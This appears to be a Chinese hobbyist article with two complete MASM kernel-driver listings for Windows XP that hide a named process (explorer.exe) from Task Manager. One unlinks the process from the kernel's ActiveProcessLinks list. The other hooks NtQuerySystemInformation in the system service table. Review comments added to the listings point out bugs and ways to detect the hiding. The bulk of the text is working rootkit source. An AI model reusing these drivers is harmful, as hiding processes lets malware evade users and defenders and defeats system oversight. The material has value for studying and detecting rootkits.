作者:dge
进程隐藏的两种方法
这两种都是很古老的方法,因为无聊,所以写了一下。代码在XP_SP2下调试通过.
(1).从活动进程链表(ActiveProcessLinks)中摘除自身,这种方法可以欺骗任务管理器,
下面这个程序做的就是双向链表的删除节点和插入节点,十分的简单。
;f:\masm32\bin\ml /nologo /c /coff HideProcess_ActiveProcessLinks.asm
;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:HideProcess_ActiveProcessLinks.sys /subsystem:native HideProcess_ActiveProcessLinks.obj
;----------------------------------------------------------------------------------------------------
; NOTE(review): 32-bit kernel driver that removes one EPROCESS from the kernel's ActiveProcessLinks
; doubly-linked list (direct kernel object manipulation). The EPROCESS field offsets are hard-coded
; per the minor version returned by PsGetVersion below, so the listing is tied to those kernels only.
; The code only rewrites Flink/Blink pointers and re-inserts the entry in _DriverUnload; it does not
; create or terminate any process. Despite the article's wording, the entry removed is the one whose
; image name equals szHide ('explorer.exe'), not the driver's own process - the caller's PID is used
; only as the starting point of the list walk. Reviewer note: enumerations that do not walk
; ActiveProcessLinks are unaffected, which is why cross-view comparison is the usual detection.
;----------------------------------------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\ntoskrnl.inc
include f:\masm32\include\w2k\w2kundoc.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac

_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP       ; prototyped only; not defined or referenced in this listing
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4   ; NOTE(review): never created with IoCreateSymbolicLink, but deleted in _DriverUnload

.data
szHide   db 'explorer.exe',0        ; image name compared (strcmp) against the name field of each EPROCESS
Flink    dd ?                       ; Flink of the removed LIST_ENTRY, saved for re-insertion at unload
Blink    dd ?                       ; Blink of the removed LIST_ENTRY, saved for re-insertion at unload
Explorer dd ?                       ; address of the removed LIST_ENTRY (inside the matched EPROCESS)
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
;----------------------------------------------------------------------------------------------------
; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pusRegistryPath)
; Creates the device object, installs _DriverUnload, then walks ActiveProcessLinks starting at the
; current process and unlinks the first entry whose name matches szHide.
; Out:   eax = STATUS_SUCCESS when the device was created and the minor version is 0 or 1;
;        STATUS_DEVICE_CONFIGURATION_ERROR otherwise.
; Regs:  esi = current LIST_ENTRY / EPROCESS cursor, edi = starting LIST_ENTRY (loop sentinel),
;        ebx = scratch during the unlink; all three are preserved via the `uses` clause.
; NOTE(review): the NTSTATUS of PsLookupProcessByProcessId is not checked and the returned object
; reference is never released in this listing.
;----------------------------------------------------------------------------------------------------
DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    local status:NTSTATUS
    local pDeviceObject:PDEVICE_OBJECT
    local dwId,lpEprocess
    local ListOffset,NameOffset     ; byte offsets inside EPROCESS: ActiveProcessLinks / image name
    local IdOffset                  ; declared but unused
    local Version                   ; minor OS version from PsGetVersion
    ; int 3
    ; invoke DbgPrint,$CTA0("\n\nEntry DriverEntry\n\n")
    mov status,STATUS_DEVICE_CONFIGURATION_ERROR
    invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
    .if eax==STATUS_SUCCESS
        mov eax,pDriverObject
        assume eax:ptr DRIVER_OBJECT
        mov [eax].DriverUnload, offset _DriverUnload
        assume eax:nothing
        ; query the OS version; only the minor version (2nd argument) is used
        invoke PsGetVersion,NULL,addr Version,NULL,NULL
        mov eax,Version
        cmp eax,0
        jne l1
        ; minor version 0: offsets used for this kernel build
        mov ListOffset,0A0h
        mov NameOffset,1fch
        jmp l2
l1:
        cmp eax,1
        jne exit                    ; any other version: leave status as configuration error
        ; minor version 1: offsets used for this kernel build
        mov ListOffset,88h
        mov NameOffset,174h
l2:
        invoke PsGetCurrentProcessId
        mov dwId,eax
        invoke PsLookupProcessByProcessId,dwId,addr lpEprocess
        mov esi,lpEprocess
        add esi,ListOffset          ; esi = &EPROCESS.ActiveProcessLinks of the current process
        mov edi,esi                 ; edi = starting entry; the walk stops when Flink points back here
        assume edi:PLIST_ENTRY
        assume esi:PLIST_ENTRY
l3:
        mov edx,[esi].Flink
        ; stop when the next entry is the starting one (the entry just before it is never compared)
        cmp edx,edi
        je l4
        assume esi:nothing
        sub esi,ListOffset
        add esi,NameOffset          ; esi = &EPROCESS.<image name> for the current entry
        invoke strcmp,esi,addr szHide
        .if eax == 0
            ; name matched: move esi back to the LIST_ENTRY and remember it for the unload path
            sub esi,NameOffset
            add esi,ListOffset
            mov Explorer,esi
            assume esi:PLIST_ENTRY
            assume ebx:PLIST_ENTRY
            assume eax:PLIST_ENTRY
            ; unlink the node: prev->Flink = next, next->Blink = prev
            mov eax,[esi].Flink
            mov ebx,[esi].Blink
            mov [ebx].Flink,eax
            mov [eax].Blink,ebx
            mov Flink,eax           ; keep both neighbours so _DriverUnload can re-insert the node
            mov Blink,ebx
            assume eax:nothing
            assume ebx:nothing
            invoke DbgPrint,$CTA0("\n\n************hide process successful ***********\n\n")
            jmp l4
        .endif
        ; no match: restore esi to the LIST_ENTRY and advance to the next process
        sub esi,NameOffset
        add esi,ListOffset
        assume esi:PLIST_ENTRY
        mov esi,[esi].Flink
        jmp l3
l4:
        assume esi:nothing
        assume edi:nothing
        mov status,STATUS_SUCCESS   ; reported even when no entry matched
exit:
    .endif
    mov eax,status
    ret
    mov eax,STATUS_DEVICE_CONFIGURATION_ERROR   ; unreachable: preceded by ret
    ret
DriverEntry endp
;----------------------------------------------------------------------------------------------------
; D R I V E R U N L O A D
;----------------------------------------------------------------------------------------------------
; VOID _DriverUnload(PDRIVER_OBJECT pDriverObject)
; Re-inserts the saved LIST_ENTRY between its saved neighbours, then tears down the symbolic link
; and the device. The re-insertion is unconditional: if DriverEntry never matched a name, Flink,
; Blink and Explorer still hold their initial values and these writes go through those values.
;----------------------------------------------------------------------------------------------------
_DriverUnload proc pDriverObject:PDRIVER_OBJECT
    ; int 3
    ; invoke DbgPrint,$CTA0("\n\nEntry DriverUnload\n\n")
    pushad
    mov eax,Flink
    mov ebx,Explorer
    assume ebx:PLIST_ENTRY
    assume eax:PLIST_ENTRY
    ; re-insert the removed node: next->Blink = node, node->Flink = next, prev->Flink = node, node->Blink = prev
    mov [eax].Blink,ebx
    mov [ebx].Flink,eax
    mov eax,Blink
    mov [eax].Flink,ebx
    mov [ebx].Blink,eax
    popad
    ; remove the symbolic link (NOTE(review): this listing never creates it)
    invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
    mov eax, pDriverObject
    ; delete the device object created in DriverEntry
    invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
    ret
_DriverUnload endp
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------
end DriverEntry
(2).如果你反汇编taskmgr.exe,可以发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的,
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为,从而实现在任务管理器中隐藏进程的目的,下面就是实现代码。 ;f:\masm32\bin\ml /nologo /c /coff hook_NtQuerySystemInformation.asm ;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:hook_NtQuerySystemInformation.sys /subsystem:native hook_NtQuerySystemInformation.obj .386 .model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; NOTE(review): this driver overwrites the system service table slot of NtQuerySystemInformation with
; NewNtQuerySystemInformation, a filter that splices SystemProcessesAndThreadsInformation records whose
; image name equals `processname` out of the caller's result buffer by adjusting the NextEntryDelta
; chain. Reviewer notes: the slot write is bracketed only by cli/sti, which masks interrupts on the
; current CPU and is not a cross-CPU synchronisation; the filter touches the caller-supplied buffer
; without probing or exception handling; a service-table entry pointing outside the kernel image is
; the usual indicator for this class of modification.
;----------------------------------------------------------------------------------------------------
; I N C L U D E F I L E S
;----------------------------------------------------------------------------------------------------
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\native.inc
include f:\masm32\include\w2k\ntoskrnl.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac
;----------------------------------------------------------------------------------------------------
; D A T A
;----------------------------------------------------------------------------------------------------
.data
; saved addresses
dwOldNtQuerySystemInformation dd ?     ; original service-table entry, restored in DriverUnload
dwAddr dd ?                            ; address of the service-table slot that was overwritten
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4   ; NOTE(review): never created in this listing, but deleted at unload
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4                    ; image name filtered out of the result buffer
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
;----------------------------------------------------------------------------------------------------
; NewNtQuerySystemInformation(SysInfoClass, lpSysInfo, SysInfoL, Return)
; Calls the real NtQuerySystemInformation, then, on success and only for
; SystemProcessesAndThreadsInformation, walks the records in lpSysInfo and removes those whose
; name (UNICODE_STRING at offset 38h) matches `processname`.
; Out:   eax = the NTSTATUS of the real call (pushad/popad preserves it).
; Regs:  esi = current record, ebx = previous record (its NextEntryDelta at offset 0 is rewritten).
; The record at lpSysInfo itself is never compared: ebx is set to it and esi advanced before the
; first comparison. SysInfoL is passed through and not used for bounds checking.
;----------------------------------------------------------------------------------------------------
NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return
    invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
    pushad
    test eax,eax
    jnz exit                                    ; real call failed: return its status untouched
    .if SysInfoClass == SystemProcessesAndThreadsInformation
        mov esi,lpSysInfo
        mov ebx,esi                             ; ebx = previous record
        add esi,[esi]                           ; esi = second record (NextEntryDelta at offset 0)
@@:
        add esi,38h                             ; the process name lives at offset 38h of the record
        invoke RtlCompareUnicodeString,addr processname, esi, 1   ; 1 = case-insensitive compare
        .if eax== 0
            invoke DbgPrint, $CTA0("\nsuccessful \n")
            .if dword ptr[esi-38h] == 0
                ; matched record is the last one: make the previous record the last
                mov dword ptr[ebx],0
                jmp exit
            .else
                ; skip the matched record: prev.NextEntryDelta += matched.NextEntryDelta
                sub esi,38h
                mov edx,[esi]
                add [ebx],edx
                add esi,[esi]                   ; continue with the record after the matched one
                jmp @B
            .endif
        .else
            sub esi,38h
            cmp dword ptr[esi],0
            jz exit                             ; last record reached
            mov ebx,esi                         ; current becomes previous
            add esi,[esi]
            jmp @B
        .endif
    .endif
exit:
    popad
    ret
NewNtQuerySystemInformation endp
;----------------------------------------------------------------------------------------------------
; H O O K F U N C
;----------------------------------------------------------------------------------------------------
; NTSTATUS HookFunction(void)
; Locates the service-table slot for NtQuerySystemInformation, saves its contents in
; dwOldNtQuerySystemInformation and dwAddr, and writes the address of NewNtQuerySystemInformation
; into it. All general registers are saved with pushad/popad; eax = STATUS_SUCCESS on return.
;----------------------------------------------------------------------------------------------------
HookFunction proc
    pushad
    ; int 3
    ; invoke DbgPrint, $CTA0("\nEntry into hoookfunction\n")
    ; use the exported KeServiceDescriptorTable symbol to reach the base of the array that holds
    ; the entry addresses of the NtXXXX services
    ; NOTE(review): the number of dereferences here depends on how the include declares the symbol; not verified
    mov eax, [KeServiceDescriptorTable]
    mov esi, [eax]
    mov esi, [esi]
    ; the next five instructions follow the ZwQuerySystemInformation import to the kernel's own
    ; stub; the byte read after `inc eax` is the low byte of the service index, scaled by 4 below
    mov eax,ZwQuerySystemInformation
    inc eax
    inc eax
    mov eax,[eax]
    mov eax,[eax]
    inc eax
    movzx ecx,byte ptr[eax]
    sal ecx,2
    add esi,ecx                                 ; esi = &ServiceTable[index]
    mov dwAddr,esi
    mov edi,dword ptr[esi]
    ; save the original entry address
    mov dwOldNtQuerySystemInformation,edi
    mov edi,offset NewNtQuerySystemInformation
    ; overwrite the entry (cli/sti only masks interrupts on this CPU)
    cli
    mov dword ptr[esi],edi
    sti
    popad
    mov eax, STATUS_SUCCESS
    ret
HookFunction endp
;----------------------------------------------------------------------------------------------------
; DriverUnload
;----------------------------------------------------------------------------------------------------
; VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
; The register context must be preserved here (the original author notes the consequences are severe
; otherwise). Restores the saved service-table entry, then deletes the symbolic link and the device.
; The restore is unconditional and relies on HookFunction having filled dwAddr.
;----------------------------------------------------------------------------------------------------
DriverUnload proc pDriverObject:PDRIVER_OBJECT
    pushad
    ; int 3
    ; invoke DbgPrint, $CTA0("\nEntry into DriverUnload \n")
    mov esi,dwAddr
    mov eax,dwOldNtQuerySystemInformation
    cli
    mov dword ptr[esi],eax                      ; put the original entry back
    sti
    invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName   ; NOTE(review): link is never created in this listing
    mov eax,pDriverObject
    invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
    popad
    ret
DriverUnload endp
;----------------------------------------------------------------------------------------------------
; D R I V E R E N T R Y
;----------------------------------------------------------------------------------------------------
; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pusRegistryPath)
; Creates the device object, installs DriverUnload and calls HookFunction.
; Out:   eax = STATUS_SUCCESS after the device is created (HookFunction's return value is ignored);
;        STATUS_DEVICE_CONFIGURATION_ERROR if IoCreateDevice fails.
;----------------------------------------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    local status:NTSTATUS
    local pDeviceObject:PDEVICE_OBJECT
    ; int 3
    ; invoke DbgPrint, $CTA0("\nEntry into DriverEntry\n")
    mov status, STATUS_DEVICE_CONFIGURATION_ERROR
    invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject
    .if eax == STATUS_SUCCESS
        mov eax, pDriverObject
        assume eax:ptr DRIVER_OBJECT
        mov [eax].DriverUnload, offset DriverUnload
        assume eax:nothing
        invoke HookFunction
        mov status, STATUS_SUCCESS
    .endif
    mov eax, status
    ret
DriverEntry endp
end DriverEntry
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------